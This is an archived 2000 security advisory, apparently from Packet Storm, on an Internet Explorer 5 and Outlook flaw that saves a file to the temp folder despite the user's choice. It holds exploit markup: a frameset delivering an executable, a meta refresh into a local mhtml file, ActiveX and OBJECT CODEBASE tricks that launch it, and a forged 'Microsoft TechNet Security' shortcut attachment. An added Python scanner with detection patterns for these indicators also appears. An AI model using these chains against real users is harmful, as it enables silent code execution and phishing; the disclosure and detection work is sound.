ie5.force-feed.txt

Reported 29 Jun 2000 by malware.com
Type: packetstorm
Source: packetstormsecurity.com

Microsoft Internet Explorer 5 and its accompanying mail and news clients ignore the user's answer to the file-download prompt: the file is written to the temp folder regardless of the choice, and a second stage can then launch it from there.

Code
`Saturday, 24 June 2000  
  
Microsoft Internet Explorer 5 and accompanying mail and news clients  
on win95, win98 and win2000 enjoy a unique status in that they  
choose to ignore user input. Specifically, we are able to manually  
force a file onto the target computer despite all prompts and warnings.  
  
A)  
  
1. How so?  
  
We again create a very simple html frameset and embed in base 64 our  
file:  
  
<frameset rows="10%,*">  
<frame src="mars.exe" >  
</frameset>  
  
2. What will happen?  
  
We create a simple html mail or news file and send it to the target  
computer. Upon receipt and opening, the recipient is prompted as to  
whether they wish to 'save' or 'open' or 'cancel' - none of these  
works. While the recipient contemplates the choices, the file is  
injected into the temp folder. Selecting any one of the three  
choices proves useless: the file is still delivered to the temp folder. In  
addition, setting the so-called Security Zone settings to DISABLE generates  
a different prompt, reading: "...your security settings do not allow file  
downloads...[something to this effect]", with the only option being OK.  
Again, selecting this proves useless.  
  
The file is still delivered to the temp folder.  
  
3. And?  
  
We then create a second file containing a different new ActiveX  
control (CLSID:15589FA1-C456-11CE-BF01-00AA0055595A) which allows us to  
execute files locally. We embed the simple JavaScript that runs  
this together with the ActiveX control in base64 and embed that in a  
second html frame:  
  
<frameset rows="10%,*">  
<frame src="mars.exe" >  
<frame src="lunar.mhtml" >  
</frameset>  
  
We again apply the very simple HTTP-EQUIV meta tag known as refresh.  
  
<meta http-equiv="refresh" content="5;  
url=mhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">  
  
and repack once again in base64.  
  
4. Results being?  
  
In the following generic and diluted web-based working example, once the  
link is clicked the file mars.mhtml deposits both the *.exe and the  
second *.mhtml file into the temp folder. The client is prompted to  
either 'save', 'open' or 'cancel'; regardless of the choice, as soon  
as the prompt has been closed down the meta refresh bounces to  
the *.mhtml in the temp folder, opens it, executes the JavaScript and  
ActiveX control, and runs the *.exe.  
  
Again, because we are working locally (from C:\WINDOWS\TEMP), none of  
the so-called Security Zone settings apply.  
  
Working Example:  
  
Note: to be executed off the web. Harmless *.exe incorporated. 5-second  
delay after clearing the prompt  
  
http://members.xoom.com/malware/mars.mhtml  
  
B)  
  
5. Can we do this from email?  
  
Yes. However, with greater likelihood of failure. Consider the  
following:  
  
Create two sets of html messages:  
  
(a) one comprising the file to be delivered:  
  
  
<frameset rows="10%,*">  
<frame src="refresh.bat" >  
</frameset>  
  
Working Example:  
  
Note: to be executed from mail client. Simple *.bat containing @exit  
  
http://members.xoom.com/malware/refresh.eml  
  
(b) the second comprising a fraudulent, manufactured *.url:  
  
Content-Type: application/octet-stream;  
name="Microsoft TechNet Security.url"  
Content-Transfer-Encoding: 7bit  
Content-Disposition: attachment;  
filename="Microsoft TechNet Security.url"  
  
[DEFAULT]  
BASEURL=C:\WINDOWS\TEMP\refresh.bat  
[InternetShortcut]  
URL=C:\WINDOWS\TEMP\refresh.bat  
  
We include a fake link: <font color=blue style="cursor:hand">....  
  
The recipient will then be forced to entertain the fraudulent *.url  
  
Working Example:  
  
Note: to be executed from mail client.  
  
http://members.xoom.com/malware/secureme.eml  
  
6. Far Fetched Scenario?  
  
Yes indeed. Send the first mail message to the target computer,  
followed by the second. The recipient opens the first mail  
message and is advised that a file is attempting to download and  
asked what they would like to do: 'save' or 'open' or 'cancel'. While this  
is being contemplated, the file is delivered to the temp folder. The  
recipient then continues with their morning activities of reading  
their email and opens the second mail message, certainly innocent  
enough looking and of course Urgent and from a Trusted Source™.  
Through the false link, they are then forced to open the attached *.url,  
which points to C:\WINDOWS\TEMP\ where the delivered file waits.  
  
This scenario can be incorporated into one single self-contained  
mail message. However the likelihood of the recipient after noting  
an attempted file download warning and then continuing with opening  
the *.url would (or should) be even slimmer. However, you never  
know.  
  
Notes:  
  
1. Tested on default installs of win95, win98 and win2000 and IE5.0  
and IE5.1 with accompanying mail and news clients. All up-to-date with  
security patches and all with the so-called Security Zone set to: DISABLE  
where possible.  
  
2. The Outlook Patch should effectively contain or disallow the  
*.url attachment. There is a workaround for that.  
  
3. The files are still delivered to the default temp folder.  
Relocate the default temp folder.  
  
4. Submitted to CERT 6/23/00 VU#26654  
  
--  
  
  
Regarding the mars exploit demo at  
http://members.xoom.com/malware/mars.mhtml. There seem to be two separate  
problems being exploited here for the desired effect of downloading and  
executing code.  
  
You can get any local .exe to execute in IE by referring to it in the  
CODEBASE parameter of an ActiveX object tag. The CLASSID can be anything  
but all zeros. Here is a code snippet, courtesy of Dildog, which will  
execute calc.exe if it is in c:\windows\system32\  
  
<HTML>  
<HEAD>  
</HEAD>  
<BODY>  
<OBJECT CLASSID='CLSID:10000000-0000-0000-0000-000000000000'  
CODEBASE='c:\windows\system32\calc.exe'></OBJECT>  
</BODY></HTML>  
  
The other problem is the fact that .exe files can get downloaded to your  
local system without you being able to cancel the operation. I tested the  
malware exploit on win98 with medium security settings (the default) and  
it worked as promised.  
  
But what was far worse was it worked at the high security setting also. A  
warning message came up saying "Due to your security settings you cannot  
download that file." You press OK and the file is downloaded anyway. Then  
it executes when used as the codebase of an ActiveX control.  
  
The demo exploit won't work in W2K because the temp directory where the  
.exe is downloaded to is "c:\documents and  
settings\'username'\local settings\temp". If it is possible to get the  
username through JavaScript and another ActiveX control it could possibly  
be made to work there also.  
  
  
  
`
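
The indicators described above are all visible in the message itself: the frameset whose frame src is an executable (part A, step 1), the meta refresh into mhtml:file:// under the temp folder (step 3), the *.url attachment whose URL= targets a local path (part B), and the OBJECT CODEBASE variant from the follow-up note. The scanner below is an added example and is not code from the advisory, from malware.com or from the follow-up author; it parses a captured .eml with Python's standard email module, unpacks base64/quoted-printable parts and nested .mhtml attachments, and reports each indicator it finds. The rule names, the extension list and the sample message it builds are constructed here (the "executable" is two dummy bytes) and are assumptions, not artefacts from the original demos.

```python
"""Scan a captured .eml/.mhtml for the IE5 force-feed indicators in the
advisory: a <frame> whose src is an executable or *.mhtml, a meta refresh
into mhtml:file:// under the temp folder, an <object> whose CODEBASE is a
local executable, and a *.url attachment whose URL= targets a local path.
Added example; rule names and the sample message are constructed."""
import re
from email import message_from_string
from email.encoders import encode_7or8bit, encode_base64
from email.message import Message
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Extensions the advisory delivers or launches (assumed list; extend as needed).
EXEC_EXT = r"\.(?:exe|bat|com|cmd|pif|scr|mhtml?|url)\b"

HTML_RULES = {  # each pattern captures the suspicious value in group 1
    "frame_to_executable": re.compile(
        r"<frame\b[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]*" + EXEC_EXT + ")", re.I),
    "meta_refresh_to_local_mhtml": re.compile(
        r"<meta\b[^>]*http-equiv\s*=\s*[\"']?refresh[\"']?[^>]*"
        r"url\s*=\s*[\"']?(mhtml:file://[^\s\"'>]+)", re.I),
    "object_codebase_local": re.compile(
        r"<object\b[^>]*\bcodebase\s*=\s*[\"']?([a-z]:\\[^\s\"'>]+)", re.I),
}
# [InternetShortcut] URL= line pointing at a drive path rather than http(s).
URL_SHORTCUT_RULE = re.compile(r"^\s*URL\s*=\s*([a-z]:\\[^\r\n]*\S)", re.I | re.M)


def iter_leaf_parts(msg: Message):
    """Yield (content_type, lowercased filename, decoded text) per leaf part."""
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""   # undoes base64 / QP
        yield (part.get_content_type(), (part.get_filename() or "").lower(),
               payload.decode("latin-1", "replace"))


def scan_message(raw: str, depth: int = 0) -> list:
    """Return (rule_name, matched_value) pairs; recurses into nested .mhtml/.eml."""
    hits = []
    for ctype, name, text in iter_leaf_parts(message_from_string(raw)):
        if ctype == "text/html" or name.endswith((".htm", ".html")):
            for rule, rx in HTML_RULES.items():
                hits.extend((rule, m.group(1)) for m in rx.finditer(text))
        elif name.endswith((".mhtml", ".mht", ".eml")) and depth < 3:
            hits.extend(scan_message(text, depth + 1))  # second-stage web archive
        if name.endswith(".url"):
            hits.extend(("url_shortcut_local_target", m.group(1))
                        for m in URL_SHORTCUT_RULE.finditer(text))
    return hits


# --- constructed sample mirroring the advisory's layout; no real payloads ---
OUTER_HTML = r"""<html><head>
<meta http-equiv="refresh" content="5;
url=mhtml:file://C:\WINDOWS\TEMP\lunar.mhtml">
</head>
<frameset rows="10%,*">
<frame src="mars.exe" >
<frame src="lunar.mhtml" >
</frameset></html>
"""
INNER_MHTML = r"""MIME-Version: 1.0
Content-Type: text/html

<html><body><object classid="CLSID:10000000-0000-0000-0000-000000000000"
codebase="c:\windows\system32\calc.exe"></object></body></html>
"""
URL_FILE = r"""[DEFAULT]
BASEURL=C:\WINDOWS\TEMP\refresh.bat
[InternetShortcut]
URL=C:\WINDOWS\TEMP\refresh.bat
"""


def build_sample() -> str:
    """Assemble the sample: HTML body, base64 mars.exe and lunar.mhtml, 7bit *.url."""
    msg = MIMEMultipart("related")
    msg["Subject"] = "Microsoft TechNet Security"
    msg.attach(MIMEText(OUTER_HTML, "html"))
    for fname, data, enc in (("mars.exe", b"MZ", encode_base64),
                             ("lunar.mhtml", INNER_MHTML.encode(), encode_base64),
                             ("Microsoft TechNet Security.url", URL_FILE.encode(), encode_7or8bit)):
        part = MIMEApplication(data, _encoder=enc, Name=fname)
        part.add_header("Content-Disposition", "attachment", filename=fname)
        msg.attach(part)
    return msg.as_string()


if __name__ == "__main__":
    for rule, value in scan_message(build_sample()):
        print(f"{rule:30} {value}")
```

Running the block prints five hits for the constructed message: two frames pointing at mars.exe and lunar.mhtml, the refresh into C:\WINDOWS\TEMP, the CODEBASE inside the nested lunar.mhtml, and the *.url whose target is the temp folder. Regex matching on decoded parts is deliberately permissive (attribute quoting and line breaks vary between mail clients), so treat a hit as a triage signal rather than a verdict.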
